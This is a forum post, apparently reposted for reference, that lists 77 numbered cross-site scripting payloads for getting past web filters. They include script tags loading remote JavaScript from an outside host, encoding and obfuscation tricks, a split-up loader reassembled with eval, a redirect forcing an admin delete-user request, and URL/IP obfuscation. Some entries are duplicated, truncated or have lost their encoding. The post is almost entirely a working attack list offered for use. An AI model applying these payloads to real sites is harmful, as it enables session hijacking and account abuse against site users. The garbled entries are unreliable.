It seems t00ls doesn't have much material on XSS, so when I saw something good I copied it over; not sure whether any of you need it for reference.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, with no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null characters are basically ineffective domestically, since there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command (can trigger arbitrary commands)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Leaving out [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Leaving out [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>